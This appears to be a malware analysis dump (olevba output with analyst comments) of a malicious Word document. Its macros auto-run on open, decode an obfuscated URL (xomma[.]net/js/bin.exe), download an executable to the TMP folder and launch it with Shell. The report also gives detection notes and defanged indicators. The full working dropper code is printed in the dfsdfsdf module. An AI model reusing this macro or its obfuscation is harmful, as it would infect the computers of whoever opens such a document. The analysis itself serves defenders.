
Malicious Word macro

dynamoo Feb 26th, 2015 362 Never
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- igm135809.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: igm135809.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: igm135809.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Auto-exec entry point. The report's ANALYSIS table classifies AutoOpen as running
  ' when the Word document is opened. Its only statement calls jQ5, which is defined in
  ' the dfsdfsdf module further down this report, so opening the document with macros
  ' enabled reaches the download-and-run routine with no further user action.
  14. Sub autoopen()
  15. jQ5
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+----------+---------------------------------------+
  20. | Type     | Keyword  | Description                           |
  21. +----------+----------+---------------------------------------+
  22. | AutoExec | AutoOpen | Runs when the Word document is opened |
  23. +----------+----------+---------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Module1.bas
  26. in file: igm135809.doc - OLE stream: u'Macros/VBA/Module1'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28.  
  ' String de-obfuscator. Returns every second character of MMzzbkwYsQ, starting with
  ' the first (positions 1, 3, 5, ...); the characters at even positions are padding
  ' and are discarded.
  '
  ' Every GoTo in this routine jumps to the label on the very next line, so none of
  ' them changes control flow. The only statements that do work are the For/Next pair
  ' and the single concatenation inside the loop.
  '
  ' Analyst note: the report's keyword scan lists nothing for this module, yet jQ5
  ' passes all of its string literals through this function. A keyword-only verdict on
  ' this module therefore understates its role in the document.
  29. Public Function ZBGUQzMmnNQjLfJi(MMzzbkwYsQ As String) As String
  30. GoTo QmoxUCfvciBJyeaaZe
  31. QmoxUCfvciBJyeaaZe:
  32. GoTo OtTFVZcTsVAkgUp
  33. OtTFVZcTsVAkgUp:
  34. GoTo kuddPCeAMbIaLPqebUnk
  35. kuddPCeAMbIaLPqebUnk:
  36. GoTo BHDPSh
  37. BHDPSh:
  ' Step 2 is the whole decoding scheme: only odd positions are visited.
  38. For NZNKEQTrblrn = 1 To Len(MMzzbkwYsQ) Step 2
  39. GoTo YSwLeyRLBhqqpufYf
  40. YSwLeyRLBhqqpufYf:
  41. GoTo VmpskIYQAjlFinAKgthS
  42. VmpskIYQAjlFinAKgthS:
  43. GoTo PrZqcgGgsmEBYtRKGR
  44. PrZqcgGgsmEBYtRKGR:
  45. GoTo TGQojMOuOUcR
  46. TGQojMOuOUcR:
  47. GoTo HFKiovanmCFIAao
  48. HFKiovanmCFIAao:
  ' Append the single character at the current (odd) position to the return value.
  49. ZBGUQzMmnNQjLfJi = ZBGUQzMmnNQjLfJi & Mid(MMzzbkwYsQ, NZNKEQTrblrn, 1)
  50. GoTo BVyDQNwJjjKS
  51. BVyDQNwJjjKS:
  52. GoTo cGfwQxICUDbKUbQ
  53. cGfwQxICUDbKUbQ:
  54. GoTo OVYhEzdfLRlti
  55. OVYhEzdfLRlti:
  56. GoTo JIMyELdDCSILDcFk
  57. JIMyELdDCSILDcFk:
  58. GoTo EZOFTeMMzzbkwYsQvN
  59. EZOFTeMMzzbkwYsQvN:
  60. GoTo KEQTrblrnzPQmoxUC
  61. KEQTrblrnzPQmoxUC:
  62. Next
  63. GoTo iBJye
  64. iBJye:
  65. GoTo ZeOHO
  66. ZeOHO:
  67. GoTo FVZcTsVAkgUpgVkuddP
  68. FVZcTsVAkgUpgVkuddP:
  69. End Function
  70.  
  71. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  72. ANALYSIS:
  73. No suspicious keyword or IOC found.
  74. -------------------------------------------------------------------------------
  75. VBA MACRO Class1.cls
  76. in file: igm135809.doc - OLE stream: u'Macros/VBA/Class1'
  77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  78. (empty macro)
  79. -------------------------------------------------------------------------------
  80. VBA MACRO dfsdfsdf.bas
  81. in file: igm135809.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
  82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Imports the Windows API URLDownloadToFileA from urlmon under the meaningless local
  ' name GHJbkjJKG. The #If VBA7 branch supplies a PtrSafe/LongPtr declaration and the
  ' #Else branch a Long-based one, so the same macro loads on both newer and older VBA
  ' hosts. In the call made by mog4O4d49 the second argument is the URL and the third is
  ' the local file path.
  '
  ' Analyst note: only the local alias is obfuscated. The library name and the real API
  ' name have to appear in clear text in a Declare statement, which is why the report's
  ' ANALYSIS table flags "Lib" and "URLDownloadToFileA" for this module.
  83. #If VBA7 Then
  84.     Private Declare PtrSafe Function GHJbkjJKG Lib "urlmon" Alias _
  85.     "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
  86.     ByVal gfhgfhF As String, _
  87.     ByVal hjkhgFF As String, _
  88.     ByVal gfhfghF As Long, _
  89.     ByVal gfdgdf As LongPtr) As LongPtr
  90. #Else
  91.     Private Declare Function GHJbkjJKG Lib "urlmon" Alias _
  92.     "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
  93.     ByVal gfhgfhF As String, _
  94.     ByVal hjkhgFF As String, _
  95.     ByVal gfhfghF As Long, _
  96.     ByVal gfdgdf As Long) As Long
  97. #End If
  ' Arithmetic on constants with no download, file or process call. No macro shown in
  ' this report calls ZXVDwjtQQrzvB71, so it appears to be filler rather than part of the
  ' download-and-run path - confirm against the full sample.
  '
  ' NOTE(review): as listed, the block If has an Else branch but no End If before
  ' End Function, and R (third statement) is not declared anywhere in view. Either the
  ' paste lost a line or this routine would not compile as shown; check the original
  ' stream before drawing conclusions from it.
  ' In VBA a "Dim a, b, c As String" list types only the last name; the names before it
  ' are Variants.
  98. Public Function ZXVDwjtQQrzvB71() As Integer
  99. Dim wFLdECQJIjCco17, aclHuKhrZdvFz71, ZGHsTHAroMpPX33, fjJHrRdaoktmZ65 As String
  100. Dim fcBkLtHUPAViT23, mWaFlcfvpbGqs65, xjTEqCqYYumMA98, jHsPLZznaTPjl82 As Integer
  101. fcBkLtHUPAViT23 = 6394
  102. wFLdECQJIjCco17 = R
  103. mWaFlcfvpbGqs65 = Asc(wFLdECQJIjCco17)
  104. If fcBkLtHUPAViT23 > mWaFlcfvpbGqs65 Then
  105.     For xjTEqCqYYumMA98 = 1 To 54
  106.        jHsPLZznaTPjl82 = mWaFlcfvpbGqs65 + xjTEqCqYYumMA98
  107.     Next xjTEqCqYYumMA98
  108. jHsPLZznaTPjl82 = jHsPLZznaTPjl82 + fcBkLtHUPAViT23
  109. aclHuKhrZdvFz71 = CStr(jHsPLZznaTPjl82)
  110. ZGHsTHAroMpPX33 = Mid$(aclHuKhrZdvFz71, 1, 4)
  111. fjJHrRdaoktmZ65 = fjJHrRdaoktmZ65 & "25"
  112. ZXVDwjtQQrzvB71 = CInt(Mid$(fjJHrRdaoktmZ65, 2, 6))
  113. Else
  114. ZXVDwjtQQrzvB71 = 54 + 6394
  115. MsgBox ("dvuZGYOgDjMWl95")
  116. End Function
  117.  
  118.  
  ' Called from autoopen. Builds two strings and hands them to mog4O4d49:
  '   1. a URL, de-obfuscated by ZBGUQzMmnNQjLfJi;
  '   2. a local path: Environ(<de-obfuscated variable name>) followed by a
  '      de-obfuscated file name.
  '
  ' Indicators, decoded by hand by keeping every second character of the three literals
  ' below (defanged; verify against the original sample before using them in a blocklist):
  '   URL:       hxxp://xomma[.]net/js/bin[.]exe
  '   Variable:  TMP
  '   File name: \GVhjJJVJH.exe   (i.e. %TMP%\GVhjJJVJH.exe)
  ' NOTE(review): the non-ASCII characters in the literals sit at discarded (even)
  ' positions, so the decoding above holds only if the paste kept each of them as a
  ' single character.
  '
  ' The report's scanner raised no IOC flag for this file (flags are MAS only), because
  ' the URL and path never appear in clear text in the macro source.
  119. Sub jQ5()
  120. mog4O4d49 ZBGUQzMmnNQjLfJi("hot}t€p.:\/R/'x*oimum6aF.1nneetf/cjlsP/]bki&nZ.Xewxdei"), Environ(ZBGUQzMmnNQjLfJi("T)M\P[")) & ZBGUQzMmnNQjLfJi("\zGfVlh\j(J_J7V3JtH^.…esxae|")
  121. End Sub
  ' Download-and-run routine.
  '   Mh9_094suu - source URL, passed as the URL argument of the aliased URLDownloadToFileA.
  '   R4_t       - local file path, used both as the download target and as the Shell command.
  ' The function never assigns its own name, so it returns the Boolean default (False);
  ' the caller ignores the result in any case.
  '
  ' Detection notes: the behaviour to look for is the Word process making an outbound
  ' HTTP request, writing an executable under the TMP directory and then starting it as
  ' a child process. Blocking macros in documents received from the Internet stops this
  ' path at autoopen.
  122. Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean
  ' The download result is stored but never checked; Shell runs whatever is at R4_t.
  123. vJHKBJdfkgfg = GHJbkjJKG(0&, Mh9_094suu, R4_t, 0&, 0&)
  124. Dim j_W8
  ' Window style 1 is vbNormalFocus: the started program gets a normal, focused window.
  125. j_W8 = Shell(R4_t, 1)
  126. End Function
  127.  
  128.  
  129.  
  130. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  131. ANALYSIS:
  132. +------------+--------------------+-----------------------------------------+
  133. | Type       | Keyword            | Description                             |
  134. +------------+--------------------+-----------------------------------------+
  135. | Suspicious | Lib                | May run code from a DLL                 |
  136. | Suspicious | Shell              | May run an executable file or a system  |
  137. |            |                    | command                                 |
  138. | Suspicious | Environ            | May read system environment variables   |
  139. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  140. +------------+--------------------+-----------------------------------------+
  141. -------------------------------------------------------------------------------
  142. VBA MACRO Module2.bas
  143. in file: igm135809.doc - OLE stream: u'Macros/VBA/Module2'
  144. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  145. (empty macro)